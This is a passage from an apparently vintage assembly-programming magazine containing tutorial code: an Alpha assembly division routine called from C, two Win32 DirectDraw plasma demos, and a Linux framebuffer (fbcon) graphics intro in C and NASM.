(Kernel
2.2.13).

The Example
-----------
My c-program calls the assembler function div which divides the first
argument
given to it by the second one. The arguments will be put in the integer
registers $16 and $17 by convention. So all we have to do is to divide
register
$16 by $17. The alpha does not know any division for integer. There is a
pseudo-
opcode for integer-division but I will show how to convert an integer to a
floating point number, do the division in the floating point registers and
convert it back to integer. Finally the result will be put by convention in
register $0 where the c-program expects it to be.

Compiling the source codes
--------------------------
gcc -c div.s
gcc -o div divide.c div.o


Source of the C-program
-----------------------
/* divide.c */
#include <stdio.h>
int main()
{
   long int a,b,c; /* long int is 64 bits long */
   a=1111; /* a random number */
   b=14;     /* second random number */
   c=div(a,b); /* div is a function written in assembler code */
   /* div returns the value of a / b */
   printf("c is %d\n",c);
   exit(0);
}
-------------------------------------------------- cut here


Source of the Assembler-Program: div.s
-------------------------------------------------- cut here
      .title div divides two arguments and returns the result
      .data               # Data section
temp1:    .quad 0             # temporary variable
temp2:    .quad 0             # temporary variable
temp3:    .quad 0             # temporary variable
      REGS = 1       # How many registers have to be saved
      STACK = REGS        # this registers will be put on the stack
      FRAME = ((STACK*8+8)/16)*16 # Stack size

      .text               # text section
      .align 4
      .set noreorder      # disallow rearrangements
      .globl div          # these 3 lines mark the
      .ent div       # mandatory function
div:                # entry
      ldgp $gp,0($27)          # load the global pointer
      lda $sp,-FRAME($sp) # load the stack pointer
      stq $26,0($sp)      # save our own exit address
      .frame $sp,FRAME,$26,0  # describe the stack frame
      .prologue 1
      stq $16,temp1       # save register $16 (first argument)
      stq $17,temp2       # save register $17 (second argument)
      ldt $f2,temp1       # load 1st argument in floating point register
      ldt $f3,temp2       # load 2nd argument in floating point register
      cvtqt $f2,$f2       # convert integer to floating point
      cvtqt $f3,$f3       # convert integer to floating point
      divt $f2,$f3,$f4    # $f4 <-- $f2 / $f3
      cvttq $f4,$f4       # convert floating point to integer
      stt $f4,temp3       # store integer
      ldq $0,temp3        # load integer in integer register
done:     ldq $26,0($sp)      # restore exit address
      lda $sp,FRAME($sp)  # Restore stack level
      ret $31,($26),1          # Back to c-program
      .end div       # Mark end of function
-------------------------------------------------- cut here



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING
                                                            Direct Draw
Examples
                                                            by X-Calibre


As a follow-up to the Direct Draw article in APJ#5, here are two complete
DirectDraw sample programs. The first uses an 8-bit palette, while the
second uses a 32-bit (truecolor) palette. To compile these, you will need to
obtain Ddraw.inc ( http://asmjournal.freeservers.com/files/Ddraw.inc.html )
for the necessary DirectDraw definitions.


;Ddplasma8.asm_________________________________________________________________
;---------------------------------------;
;    DDRAW Plasma Demo                  ;
;                                       ;
;    Author :         X-Calibre         ;
;    ASM version :    Ewald Snel        ;
;    Copyright (C) 1999, Diamond Crew   ;
;                                       ;
;    http://here.is/diamond/            ;
;---------------------------------------;

     TITLE WIN32ASM EXAMPLE
     .486
     .MODEL FLAT, STDCALL
     option casemap :none

;-----------------------------------------------------------;
;                WIN32ASM / DDRAW PLASMA DEMO               ;
;-----------------------------------------------------------;

     INCLUDE \masm32\include\windows.inc

   ; -----------------------------------
   ; Note that the following is the
   ; include file written by Ewald Snel.
   ; -----------------------------------
     INCLUDE \masm32\include\ddraw.inc

     INCLUDE \masm32\include\gdi32.inc
     INCLUDE \masm32\include\kernel32.inc
     INCLUDE \masm32\include\user32.inc

     includelib \masm32\lib\gdi32.lib
     includelib \masm32\lib\ddraw.lib
     includelib \masm32\lib\kernel32.lib
     includelib \masm32\lib\user32.lib


     WinMain    PROTO :DWORD,:DWORD,:DWORD,:DWORD
     WndProc    PROTO :DWORD,:DWORD,:DWORD,:DWORD
     nextFrame  PROTO
     initPlasma PROTO

RETURN MACRO arg
     IFNB <arg>
         mov            eax, arg
     ENDIF
     ret
ENDM

LRETURN MACRO arg
     IFNB <arg>
         mov            eax, arg
     ENDIF
     leave
     ret
ENDM

FATAL MACRO msg
     LOCAL @@msg
     .DATA
     @@msg        db        msg, 0
     .CODE

     INVOKE MessageBox, hWnd, ADDR @@msg, ADDR szDisplayName, MB_OK
     INVOKE ExitProcess, 0
ENDM


.DATA?

hWnd            HWND                ?        ; surface window
lpDD            LPDIRECTDRAW        ?        ; DDraw object
lpDDSPrimary    LPDIRECTDRAWSURFACE ?        ; DDraw primary surface
ddsd            DDSURFACEDESC       <?>      ; DDraw surface descriptor
ddscaps         DDSCAPS             <?>      ; DDraw capabilities


palette            dd        256 dup (?)
table              dd        512 dup (?)
lpDDPalette        dd        ?


.DATA

ddwidth            EQU        320                ; display mode width
ddheight           EQU        200                ; display mode height
ddbpp              EQU        8                  ; display mode color depth

phaseA             dd         0
phaseB             dd         0

factor1            EQU        -2
factor2            EQU        -1
factor3            EQU         1
factor4            EQU        -2

red                dd        500.0
green              dd        320.0
blue               dd        372.0

scale1             dd        2.0
scale2             dd        128.0
scale3             dd        256.0
scale4             dd        127.0

szClassName        db            "DDRAW Plasma Demo", 0    ; class name
szDisplayName      EQU            <szClassName>            ; window name
color              dd            0

wc                WNDCLASSEX    < SIZEOF WNDCLASSEX, CS_HREDRAW OR
CS_VREDRAW,
                                    OFFSET WndProc, 0, 0, , 0, 0, , 0,
                                                          OFFSET szClassName,
0
>

.CODE

start:

     INVOKE GetModuleHandle, NULL
     INVOKE WinMain, eax, NULL, NULL, SW_SHOWDEFAULT
     INVOKE ExitProcess, eax

;-----------------------------------------------------------;
;                Calculate Next Plasma Frame                ;
;-----------------------------------------------------------;

nextFrame    PROC
     push        ebx
     push        esi
     push        edi

     mov            ecx , ddheight                ; # of scanlines
     mov            edi , [ddsd.lpSurface]        ; pixel output

@@scanline:
     push        ecx
     push        edi

     mov            esi , [phaseA]
     mov            edx , [phaseB]
     sub            esi , ecx
     and            edx , 0ffH
     and            esi , 0ffH
     mov            edx , [table][4*edx][256*4]
     mov            esi , [table][4*esi]        ; [x]  +  table0[a + y]
     sub            edx , ecx                    ; [y]  +  table1[b]
     mov            ecx , ddwidth                ; [x] --> pixel counter

@@pixel:
     and            esi , 0ffH
     and            edx , 0ffH
     mov            eax , [table][4*esi]
     mov            ebx , [table][4*edx][256*4]
     add            eax , ebx
     add            esi , factor3
     shr            eax , 1
     inc            edi
     add            edx , factor4
     dec            ecx
     mov            [edi][-1] , al
     jnz            @@pixel

     pop            edi
     pop            ecx
     add            edi , [ddsd.lPitch]            ; inc. display position
     dec            ecx
     jnz            @@scanline

     add            [phaseA] , factor1
     add            [phaseB] , factor2

     pop            edi
     pop            esi
     pop            ebx

     ret
nextFrame    ENDP

;-----------------------------------------------------------;
;                Initalize Plasma Tables                        ;
;-----------------------------------------------------------;

initPlasma    PROC

     LOCAL @@i :DWORD
     LOCAL @@r :DWORD
     LOCAL @@g :DWORD
     LOCAL @@b :DWORD
     LOCAL temp :DWORD


     mov            [@@i] , 0

     .WHILE @@i < 256

         mov            edx , [@@i]

; Calculate table0 value

         fldpi
         fimul        DWORD PTR [@@i]
         fmul        REAL4 PTR [scale1]
         fdiv        REAL4 PTR [scale3]
         fsin
         fmul        REAL4 PTR [scale4]
         fadd        REAL4 PTR [scale2]
         fistp        DWORD PTR [table][4*edx]

; Calculate table1 value

         fldpi
         fimul        DWORD PTR [@@i]
         fmul        REAL4 PTR [scale1]
         fdiv        REAL4 PTR [scale3]
         fcos
         fmul        REAL4 PTR [scale2]
         fadd        REAL4 PTR [scale2]
         fldpi
         fmulp        st(1), st
         fmul        REAL4 PTR [scale1]
         fdiv        REAL4 PTR [scale3]
         fsin
         fmul        REAL4 PTR [scale4]
         fadd        REAL4 PTR [scale2]
         fistp        DWORD PTR [table][4*edx][4*256]

; Calculate palette value

         xor            eax , eax

         FOR comp, <red, green, blue>
             fldpi
             fimul        DWORD PTR [@@i]
             fmul        REAL4 PTR [scale1]
             fdiv        REAL4 PTR [comp]
             fcos
             fmul        REAL4 PTR [scale4]
             fadd        REAL4 PTR [scale2]
             fistp        DWORD PTR [temp]
             shl            eax , 8
             or            eax , [temp]
         ENDM

         bswap          eax
         shr            eax, 8
         mov            [palette][4*edx] , eax
         inc            [@@i]

     .ENDW

       ; Set palette
       DDINVOKE        CreatePalette, lpDD, DDPCAPS_8BIT or DDPCAPS_ALLOW256,
                                       ADDR palette, ADDR lpDDPalette, NULL
      .IF eax != DD_OK
           FATAL "Couldn't create palette"
      .ENDIF

      DDSINVOKE       SetPalette, lpDDSPrimary, lpDDPalette
      .IF eax != DD_OK
           FATAL "Couldn't set palette"
      .ENDIF

     ret

initPlasma    ENDP

;-----------------------------------------------------------;
;                WinMain  ( entry point )                   ;
;-----------------------------------------------------------;

WinMain PROC hInst     :DWORD,
              hPrevInst :DWORD,
              CmdLine   :DWORD,
              CmdShow   :DWORD

     LOCAL msg  :MSG

; Fill WNDCLASSEX structure with required variables

     mov            eax , [hInst]
     mov            [wc.hInstance] , eax
     INVOKE         GetStockObject , BLACK_BRUSH
     mov            [wc.hbrBackground] , eax

     INVOKE RegisterClassEx, ADDR wc


; Create window at following size

     INVOKE CreateWindowEx, 0,
                             ADDR szClassName,
                             ADDR szDisplayName,
                             WS_POPUP,
                             0, 0, ddwidth, ddheight,
                             NULL, NULL,
                             hInst, NULL
     mov            [hWnd] , eax

     INVOKE ShowWindow, hWnd, SW_MAXIMIZE
     INVOKE SetFocus, hWnd
     INVOKE ShowCursor, 0


; Initialize display

     INVOKE DirectDrawCreate, NULL, ADDR lpDD, NULL
     .IF eax != DD_OK
         FATAL "Couldn't init DirectDraw"
     .ENDIF

     DDINVOKE SetCooperativeLevel, lpDD, hWnd, DDSCL_EXCLUSIVE OR
DDSCL_FULLSCREEN
     .IF eax != DD_OK
         FATAL "Couldn't set DirectDraw cooperative level"
     .ENDIF

     DDINVOKE SetDisplayMode, lpDD, ddwidth, ddheight, ddbpp
     .IF eax != DD_OK
         FATAL "Couldn't set display mode"
     .ENDIF

     mov            [ddsd.dwSize] , SIZEOF DDSURFACEDESC
     mov            [ddsd.dwFlags] , DDSD_CAPS
     mov            [ddsd.ddsCaps.dwCaps] , DDSCAPS_PRIMARYSURFACE
     DDINVOKE CreateSurface, lpDD, ADDR ddsd, ADDR lpDDSPrimary, NULL
     .IF eax != DD_OK
     FATAL "Couldn't create primary surface"
     .ENDIF

     call        initPlasma

; Loop until PostQuitMessage is sent
     .WHILE 1

         INVOKE PeekMessage, ADDR msg, NULL, 0, 0, PM_REMOVE

         .IF eax != 0
             .IF msg.message == WM_QUIT
                 INVOKE PostQuitMessage, msg.wParam
                 .BREAK
             .ELSE
                 INVOKE TranslateMessage, ADDR msg
                 INVOKE DispatchMessage, ADDR msg
             .ENDIF
         .ELSE
             INVOKE GetFocus

             .IF eax == hWnd

                 mov            [ddsd.dwSize] , SIZEOF DDSURFACEDESC
                 mov            [ddsd.dwFlags] , DDSD_PITCH

                 .WHILE 1
                     DDSINVOKE mLock, lpDDSPrimary, NULL, ADDR ddsd,
DDLOCK_WAIT, NULL

                     .BREAK .IF eax == DD_OK

                     .IF eax == DDERR_SURFACELOST
                         DDSINVOKE Restore, lpDDSPrimary
                     .ELSE
                         FATAL "Couldn't lock surface"
                     .ENDIF
                 .ENDW

                 DDINVOKE WaitForVerticalBlank, lpDD, DDWAITVB_BLOCKBEGIN,
NULL

                 call        nextFrame

                 DDSINVOKE Unlock, lpDDSPrimary, ddsd.lpSurface

             .ENDIF
         .ENDIF
     .ENDW

     .IF lpDD != NULL

           .IF lpDDSPrimary != NULL
             DDSINVOKE Release, lpDDSPrimary
             mov            [lpDDSPrimary] , NULL
         .ENDIF

          DDINVOKE Release, lpDD
         mov            [lpDD] , NULL

     .ENDIF

     LRETURN msg.wParam

WinMain ENDP

;-----------------------------------------------------------;
;                Window Proc  ( handle events )                ;
;-----------------------------------------------------------;

WndProc PROC hWin   :DWORD,
              uMsg   :DWORD,
              wParam :DWORD,
              lParam :DWORD

     .IF uMsg == WM_KEYDOWN
         .IF wParam == VK_ESCAPE
             INVOKE PostQuitMessage, NULL
             RETURN 0
         .ENDIF
     .ELSEIF uMsg == WM_DESTROY
         INVOKE PostQuitMessage, NULL
         RETURN 0
     .ENDIF

     INVOKE DefWindowProc, hWin, uMsg, wParam, lParam

     ret

WndProc ENDP

END start
;End_Ddplasma8.asm_____________________________________________________________


;Ddplasma32.asm________________________________________________________________
;---------------------------------------;
;    DDRAW Plasma Demo                  ;
;                                       ;
;    Author :         X-Calibre         ;
;    ASM version :    Ewald Snel        ;
;    Copyright (C) 1999, Diamond Crew   ;
;                                       ;
;    http://here.is/diamond/            ;
;---------------------------------------;

     TITLE WIN32ASM EXAMPLE
     .386
     .MODEL FLAT, STDCALL
     option casemap :none

;-----------------------------------------------------------;
;                WIN32ASM / DDRAW PLASMA DEMO               ;
;-----------------------------------------------------------;

     INCLUDE \masm32\include\windows.inc

   ; -----------------------------------
   ; Note that the following is the
   ; include file written by Ewald Snel.
   ; -----------------------------------
     INCLUDE .\ddraw.inc

     INCLUDE \masm32\include\gdi32.inc
     INCLUDE \masm32\include\kernel32.inc
     INCLUDE \masm32\include\user32.inc

     includelib \masm32\lib\gdi32.lib
     includelib \masm32\lib\ddraw.lib
     includelib \masm32\lib\kernel32.lib
     includelib \masm32\lib\user32.lib


     WinMain    PROTO :DWORD,:DWORD,:DWORD,:DWORD
     WndProc    PROTO :DWORD,:DWORD,:DWORD,:DWORD
     nextFrame  PROTO
     initPlasma PROTO

RETURN MACRO arg
     IFNB <arg>
         mov            eax, arg
     ENDIF
     ret
ENDM

LRETURN MACRO arg
     IFNB <arg>
         mov            eax, arg
     ENDIF
     leave
     ret
ENDM

FATAL MACRO msg
     LOCAL @@msg
     .DATA
     @@msg        db        msg, 0
     .CODE

     INVOKE MessageBox, hWnd, ADDR @@msg, ADDR szDisplayName, MB_OK
     INVOKE ExitProcess, 0
ENDM


.DATA?

palette            dd        256 dup (?)
table              dd        512 dup (?)
hWnd            HWND                ?        ; surface window
lpDD            LPDIRECTDRAW        ?        ; DDraw object
lpDDSPrimary    LPDIRECTDRAWSURFACE ?        ; DDraw primary surface
ddsd            DDSURFACEDESC       <?>      ; DDraw surface descriptor
ddscaps            DDSCAPS          <?>      ; DDraw capabilities


.DATA

ddwidth            EQU        320                ; display mode width
ddheight           EQU        200                ; display mode height
ddbpp              EQU        32                 ; display mode color depth

phaseA             dd         0
phaseB             dd         0

factor1            EQU        -2
factor2            EQU        -1
factor3            EQU         1
factor4            EQU        -2

red                dd        500.0
green              dd        320.0
blue               dd        372.0

scale1             dd        2.0
scale2             dd        128.0
scale3             dd        256.0
scale4             dd        127.0


szClassName        db            "DDRAW Plasma Demo", 0    ; class name
szDisplayName    EQU            <szClassName>            ; window name
color            dd            0

wc                WNDCLASSEX    < SIZEOF WNDCLASSEX, CS_HREDRAW OR
CS_VREDRAW,
                                   OFFSET WndProc, 0, 0, , 0, 0, , 0,
                                                         OFFSET szClassName,
0 >


.CODE

start:

     INVOKE GetModuleHandle, NULL
     INVOKE WinMain, eax, NULL, NULL, SW_SHOWDEFAULT
     INVOKE ExitProcess, eax

;-----------------------------------------------------------;
;                Calculate Next Plasma Frame                ;
;-----------------------------------------------------------;

nextFrame    PROC
     push        ebx
     push        esi
     push        edi

     mov            ecx , ddheight                ; # of scanlines
     mov            edi , [ddsd.lpSurface]        ; pixel output

@@scanline:
     push        ecx
     push        edi

     mov            esi , [phaseA]
     mov            edx , [phaseB]
     sub            esi , ecx
     and            edx , 0ffH
     and            esi , 0ffH
     mov            edx , [table][4*edx][256*4]
     mov            esi , [table][4*esi]        ; [x]  +  table0[a + y]
     sub            edx , ecx                    ; [y]  +  table1[b]
     mov            ecx , ddwidth                ; [x] --> pixel counter

@@pixel:
     and            esi , 0ffH
     and            edx , 0ffH
     mov            eax , [table][4*esi]
     mov            ebx , [table][4*edx][256*4]
     add            eax , ebx
     add            esi , factor3
     shr            eax , 1
     add            edx , factor4
     and            eax , 0ffH
     add            edi , 4
     mov            eax , [palette][4*eax]
     dec            ecx
     mov            [edi][-4] , eax
     jnz            @@pixel

     pop            edi
     pop            ecx
     add            edi , [ddsd.lPitch]            ; inc. display position
     dec            ecx
     jnz            @@scanline

     add            [phaseA] , factor1
     add            [phaseB] , factor2

     pop            edi
     pop            esi
     pop            ebx

     ret
nextFrame    ENDP

;-----------------------------------------------------------;
;              Initalize Plasma Tables                      ;
;-----------------------------------------------------------;

initPlasma    PROC

     LOCAL @@i :DWORD
     LOCAL @@r :DWORD
     LOCAL @@g :DWORD
     LOCAL @@b :DWORD
     LOCAL temp :DWORD


     mov            [@@i] , 0

     .WHILE @@i < 256

         mov            edx , [@@i]

; Calculate table0 value

         fldpi
         fimul        DWORD PTR [@@i]
         fmul        REAL4 PTR [scale1]
         fdiv        REAL4 PTR [scale3]
         fsin
         fmul        REAL4 PTR [scale4]
         fadd        REAL4 PTR [scale2]
         fistp        DWORD PTR [table][4*edx]

; Calculate table1 value

         fldpi
         fimul        DWORD PTR [@@i]
         fmul        REAL4 PTR [scale1]
         fdiv        REAL4 PTR [scale3]
         fcos
         fmul        REAL4 PTR [scale2]
         fadd        REAL4 PTR [scale2]
         fldpi
         fmulp        st(1), st
         fmul        REAL4 PTR [scale1]
         fdiv        REAL4 PTR [scale3]
         fsin
         fmul        REAL4 PTR [scale4]
         fadd        REAL4 PTR [scale2]
         fistp        DWORD PTR [table][4*edx][4*256]

; Calculate palette value

         xor            eax , eax

         FOR comp, <red, green, blue>
             fldpi
             fimul        DWORD PTR [@@i]
             fmul        REAL4 PTR [scale1]
             fdiv        REAL4 PTR [comp]
             fcos
             fmul        REAL4 PTR [scale4]
             fadd        REAL4 PTR [scale2]
             fistp        DWORD PTR [temp]
             shl            eax , 8
             or            eax , [temp]
         ENDM

         mov            [palette][4*edx] , eax
         inc            [@@i]

     .ENDW

     ret

initPlasma    ENDP

;-----------------------------------------------------------;
;                WinMain  ( entry point )                   ;
;-----------------------------------------------------------;

WinMain PROC hInst     :DWORD,
              hPrevInst :DWORD,
              CmdLine   :DWORD,
              CmdShow   :DWORD

     LOCAL msg  :MSG

; Fill WNDCLASSEX structure with required variables

     mov            eax , [hInst]
     mov            [wc.hInstance] , eax
     INVOKE         GetStockObject, BLACK_BRUSH
     mov            [wc.hbrBackground] , eax

     INVOKE RegisterClassEx, ADDR wc


; Create window at following size

     INVOKE CreateWindowEx, 0,
                             ADDR szClassName,
                             ADDR szDisplayName,
                             WS_POPUP,
                             0, 0, ddwidth, ddheight,
                             NULL, NULL,
                             hInst, NULL
     mov            [hWnd] , eax

     INVOKE ShowWindow, hWnd, SW_MAXIMIZE
     INVOKE SetFocus, hWnd
     INVOKE ShowCursor, 0


; Initialize display

     INVOKE DirectDrawCreate, NULL, ADDR lpDD, NULL
     .IF eax != DD_OK
         FATAL "Couldn't init DirectDraw"
     .ENDIF

     DDINVOKE SetCooperativeLevel, lpDD, hWnd, DDSCL_EXCLUSIVE OR
DDSCL_FULLSCREEN
     .IF eax != DD_OK
         FATAL "Couldn't set DirectDraw cooperative level"
     .ENDIF

     DDINVOKE SetDisplayMode, lpDD, ddwidth, ddheight, ddbpp
     .IF eax != DD_OK
         FATAL "Couldn't set display mode"
     .ENDIF

     mov            [ddsd.dwSize] , SIZEOF DDSURFACEDESC
     mov            [ddsd.dwFlags] , DDSD_CAPS
     mov            [ddsd.ddsCaps.dwCaps] , DDSCAPS_PRIMARYSURFACE
     DDINVOKE CreateSurface, lpDD, ADDR ddsd, ADDR lpDDSPrimary, NULL
     .IF eax != DD_OK
     FATAL "Couldn't create primary surface"
     .ENDIF


     call        initPlasma

; Loop until PostQuitMessage is sent

     .WHILE 1

         INVOKE PeekMessage, ADDR msg, NULL, 0, 0, PM_REMOVE

         .IF eax != 0
             .IF msg.message == WM_QUIT
                 INVOKE PostQuitMessage, msg.wParam
                 .BREAK
             .ELSE
                 INVOKE TranslateMessage, ADDR msg
                 INVOKE DispatchMessage, ADDR msg
             .ENDIF
         .ELSE
             INVOKE GetFocus

             .IF eax == hWnd

                 mov            [ddsd.dwSize] , SIZEOF DDSURFACEDESC
                 mov            [ddsd.dwFlags] , DDSD_PITCH

                 .WHILE 1
                     DDSINVOKE mLock, lpDDSPrimary, NULL, ADDR ddsd,
DDLOCK_WAIT, NULL

                     .BREAK .IF eax == DD_OK

                     .IF eax == DDERR_SURFACELOST
                         DDSINVOKE Restore, lpDDSPrimary
                     .ELSE
                         FATAL "Couldn't lock surface"
                     .ENDIF
                 .ENDW

                 DDINVOKE WaitForVerticalBlank, lpDD, DDWAITVB_BLOCKBEGIN,
NULL

                 call        nextFrame

                 DDSINVOKE Unlock, lpDDSPrimary, ddsd.lpSurface

             .ENDIF
         .ENDIF
     .ENDW

     .IF lpDD != NULL

           .IF lpDDSPrimary != NULL
             DDSINVOKE Release, lpDDSPrimary
             mov            [lpDDSPrimary] , NULL
         .ENDIF

          DDINVOKE Release, lpDD
         mov            [lpDD] , NULL

     .ENDIF

     LRETURN msg.wParam

WinMain ENDP

;-----------------------------------------------------------;
;                Window Proc  ( handle events )                ;
;-----------------------------------------------------------;

WndProc PROC hWin   :DWORD,
              uMsg   :DWORD,
              wParam :DWORD,
              lParam :DWORD

     .IF uMsg == WM_KEYDOWN
         .IF wParam == VK_ESCAPE
             INVOKE PostQuitMessage, NULL
             RETURN 0
         .ENDIF
     .ELSEIF uMsg == WM_DESTROY
         INVOKE PostQuitMessage, NULL
         RETURN 0
     .ENDIF

     INVOKE DefWindowProc, hWin, uMsg, wParam, lParam

     ret

WndProc ENDP

END start
;End_Ddplasma32.asm____________________________________________________________





I had mail problems last time... I don't think the example program from
the DDRAW tut ever reached you... and now you were looking for a Windows
article for issue #6... Maybe you can put the example in there... It's
Win32, and it would also double as a sequel to the article of issue #5
:)
Well, there's 2 examples actually... They look the same on screen, but 1
displays how to use 8 bit palette mode (like good old mode 13h), where
the other shows 32 bit truecolor mode...
I also included the original DDRAW.INC, so people can assemble the
sources themselves...
I hope this time it reaches you, and that I could have been of help to
you,
X-Calibre

WINDOWS



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::............................................THE.UNIX.WORLD
                                                         Enter fbcon
                                                         by Konstantin
Boldyshev


Many of Linux users have heard something about fbcon. It is becoming more
and more popular, mostly because of capability of getting graphics on
usual terminal without X. How to use graphic capabilities of fbcon?

The /dev/fb# devices represent frame buffer devices; they allow the frame
buffer of a video card to be read and written to by a user, and allow a
programmer to access the video hardware [and, more importantly, the video
memory] through ioctls and memory mapping.

The general approach to using fbcon is pretty simple:
   1) open /dev/fb0
   2) mmap /dev/fb0
   3) .. do the thing .. (use pointer returned by mmap to access videomemory)
   4) munmap /dev/fb0
   5) close /dev/fb0

I've taken one of my old DOS intros made in tasm, and rewritten it for nasm
and Linux/fbcon. At 408 bytes, This intro is the smallest implementation of
linear transformation with recursion (AFAIK).

Leaves.asm runs for about a minute and a half (depends on machine), and is
interruptible at any time with ^C. If everything is ok you should see two
branches of green leaves, and kinda wind blowing on them. It MUST be run
only
in 640x480x256 mode (vga=0x301 in lilo.conf). You will see garbage or
incorrect
colors in other modes.

Warning! Intro assumes that everything is ok with the system (/dev/fb0
exists,
can be opened and mmap()ed, correct video mode is set, and so on). So, if
you
ain't root, check permissions on /dev/fb0 first, or you will not see
anything.

The source is quite portable, you only need to implement putpixel() and
initial-
ization part for your OS. To get the basic idea across, here is the fbcon
implementation in C:

//==========================================================================
// leaves.c : C implementation using /dev/fb0
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>

typedef unsigned char byte;
typedef unsigned int  word;
typedef float dword;

#define MaxX 640
#define MaxY 480
#define VMEM_SIZE MaxX*MaxY

#define xc MaxX/2
#define yc MaxY/2
#define xmin0 100
#define xmax0 -xmin0
#define ymin0 xmin0
#define ymax0 -ymin0

#define colornum 8

int  h;
byte *p;

byte ColorTable[colornum] = { 0x00,0x00,0x02,0x00,0x00,0x02,0x0A,0x02 };
int color=0;

dword f=MaxY/(ymax0-ymin0)*3/2;
dword x1coef=MaxX-MaxY*4/9-yc;
dword y1coef=MaxY/4+xc;
dword x2coef=MaxY*4/9+yc;
dword x0=110;

dword a=0.7;
dword b=0.2;
dword c=0.5;
dword d=0.3;

void putpixel(word x,word y,byte color)
{
     *(p+y*MaxX+x) = color;
}

void leaves(dword x,dword y,byte n)
{
word x1,y1;

if (n>0)
   {
   y1=f*x+y1coef;

   putpixel(x1coef-f*y,y1,ColorTable[color]);
   putpixel(f*y+x2coef,y1,ColorTable[color]);

   if (++color>colornum-1) color=0;

   leaves(a*x+b*y,        b*x-a*y,     n-1);
   leaves(c*(x-x0)-d*y+x0,d*(x-x0)+c*y,n-1);

}
}

int main(void)
{
int i;


p=mmap(0,VMEM_SIZE,PROT_READ|PROT_WRITE,MAP_SHARED,open("/dev/fb0",O_RDWR),0);

      for (i=0;i<VMEM_SIZE;i++) *(p+i) = 0;

      leaves(0,0,28);

      munmap(p,VMEM_SIZE);
      close(h);
}
//--------------------------------------------------------------------------EOF

Here is the asm source. It is quite short and self-explaining :) Well,
actually
the source is badly optimized for size, contains some Linux-specific tricks,
and can be hard to understand. Please refer to the C source for areas that
need
clarification

NOTE:     The following source was taken from asmutils and requires asmutils
         macros (*.inc), available from http://linuxassembly.org;
         you can also download binary there (in samples archive)

To compile leaves.asm:
           $ nasm -f elf leaves.asm
           $ ld -s -o leaves leaves.o

;==========================================================================
;Copyright (C) 1999 Konstantin Boldyshev <konst@...>
;
;leaves        -    fbcon intro in 408 bytes
;
;Ah, /if haven't guessed yet/ license is GPL, so enjoy! :)

%include "system.inc"

%assign SIZE_X 640
%assign SIZE_Y 480
%assign DEPTH 8
%assign VMEM_SIZE SIZE_X*SIZE_Y

%define MaxX 640.0
%define MaxY 480.0
%define xc MaxX/2
%define yc MaxY/2
%define xmin0 100.0
%define xmax0 -xmin0
%define ymin0 xmin0
%define ymax0 -ymin0

CODESEG
;al  -    color
putpixel:
      push edx
         lea    edx,[ebx+ebx*4]     ;computing offset..
         shl    edx,byte 7     ;multiply on 640
      add  edx,[esp+8]    ;
      mov  [edx+esi],al   ;write to frame buffer
      pop  edx
_return:
         ret

; recursive function itself
leaves:
         mov    ecx,[esp+12]
         test   cl,cl
      jz   _return
         mov    [esp-13],cl
         mov    eax,[edi]
         push   ecx
         sub    esp,byte 8
      mov  edx,esp

      fld  dword [ebp+16] ;[f]
      fld  st0
      fld  st0
      fmul dword [edx+16]
      fadd dword [ebp+24] ;[y1coef]
      fistp     dword [edx]
         mov    ebx,[edx]
      fmul dword [edx+20]
      fsubr     dword [ebp+20] ;[x1coef]
      fistp     dword [edx]
         call   putpixel
      fmul dword [edx+20]
      fadd dword [ebp+28] ;[x2coef]
      fistp     dword [edx]
         call   putpixel
      inc  edi
         cmp    edi,ColorEnd
         jl     .rec
      sub  edi,byte ColorEnd-ColorBegin

.rec:
      fld  dword [ebp+4]  ;[b]
      fld  dword [ebp]    ;[a]
      fld  st1
      fld  st1
      fxch
      fmul dword [edx+16]
      fxch
      fmul dword [edx+20]
      fsubp     st1
      fstp dword [edx-8]

      fmul dword [edx+16]
      fxch
      fmul dword [edx+20]
      faddp     st1
      dec  ecx
         push   ecx
         sub    esp,byte 8
      fstp dword [esp]
         call   leaves         ;esp+12
      mov  edx,esp
      fld  dword [ebp+12] ;[d]
      fld  dword [edx+28]
      fld  dword [ebp+8]  ;[c]
      fld  dword [ebp+32] ;[x0]
      fsub to st2
      fld  st3
      fld  st2
      fxch
      fmul st4
      fxch
      fmul dword [edx+32]
      faddp     st1
      fstp dword [edx-8]

      fxch
      fmulp     st2
      fxch st2
      fmul dword [edx+32]
      fsubp     st1
      faddp     st1
         push   ecx
         sub    esp,byte 8
      fstp dword [esp]
         call   leaves
         add    esp,byte 12*2+8
         pop    ecx
.return:
         ret

;------------------------------------- main()
START:
;prepare structure for mmap on the stack
      mov  edi,VMEM_SIZE
      mov  esi,esp
      mov  [esi-16],edi                  ;.len
      mov  [esi-12],byte PROT_READ|PROT_WRITE ;.prot
      mov  [esi-8],byte MAP_SHARED            ;.flags
      mov  [esi],edx                ;.offset

;init fb
      mov  ebp,Params
      lea  ebx,[ebp+0x2C] ;fb-Params
      sys_open EMPTY,O_RDWR

      test eax,eax        ;have we opened file?
      js   exit

      mov  [esi-4],eax    ;mm.fd
      lea  ebx,[esi-20]
      sys_mmap

      test eax,eax        ;have we mmaped file?
      js   exit

      mov  esi,eax

;clear screen
      mov  ecx,edi
      mov  edi,esi
      xor  eax,eax
      rep  stosb

;leaves
      lea  edi,[ebp+0x24] ;ColorBegin-Params
         push   byte 28        ;recursion depth
      push eax
      push eax
         call   leaves

;close fb
      sys_munmap esi,VMEM_SIZE
      sys_close [mm.fd]

exit:
      sys_exit

;----------------------------Parameters
Params:

a    dd   0.7
b    dd   0.2
c    dd   0.5
d    dd   0.3

f    dd   0xc0400000     ;MaxY/(ymax0-ymin0)*3/2
x1coef    dd   0x433b0000     ;MaxX-MaxY*4/9-yc
y1coef    dd   0x43dc0000     ;MaxY/4+xc
x2coef    dd   0x43e28000     ;MaxY*4/9+yc
x0   dd   112.0

ColorBegin:
      db   0,0,2,0,0,2,10,2
ColorEnd:

fb   db   "/dev/fb0";,NULL

END
;===========================================================================EOF

More information on the frame buffer device can be found in the Linux kernel
documentation [ usually /usr/src/linux/Documentation ] files
framebuffer.txt,
internals.txt, matroxfb.txt, tgafb.txt, and vesafb.txt. The /dev/fbcon#
ioctls
are defined in /usr/include/linux/fb.h .

Enjoy the demo!
















::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
